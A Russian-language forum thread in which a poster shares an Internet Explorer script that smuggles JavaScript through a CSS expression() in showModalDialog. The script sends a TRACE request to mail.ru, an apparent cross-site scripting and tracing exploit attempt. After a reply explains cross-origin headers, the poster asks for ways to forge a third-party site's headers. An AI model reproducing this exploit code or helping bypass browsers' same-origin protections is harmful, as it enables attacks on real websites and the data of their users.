Подскажите пожалуста, каким образом можно отправить AJAX запрос на сторонний URL. Я нашел вариант для Internet Explorer: Code: <script> function xssDomainRequest(){ var exampleCode = "var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');xmlHttp.open('TRACE','http://mail.ru',false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);"; cExampleCode = encodeURIComponent(exampleCode + ';top.close()'); var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))'; showModalDialog('http://www.mail.ru',null,readyCode);} </script> Все вроде логично, но IE выдает ошибку, недопустимый аргумент, походу он не пропускает expression в showModalDialog. Что делать???
Тоесть, как я понял, до выхода IE8 с поддержкой XDomainRequest выполнить запрос, типо trace, не получится, так?
Firefox3 - это гуд, я уже даже разобрался, че да как. А уязвимость в IE с showModalDialog походу прикрыли((
Не, с ним тоже трабл, при попытке сделать запрос на другой домен, он его не грузит, а в консоли ошибок пишет, что ошибка системы безопасности, содержимое "мой адрес" не имеет права загружать данные с "запрашиваемый адрес".
ты точно разобрался? Скрипт, которому ты отправляешь запрос, должен возвращать специальный заголовок.
Спасибо, все работает. Теперь думаю, каким бы образом фальсифицировать заголок стороннего сайта. Есть идеи на этот счет?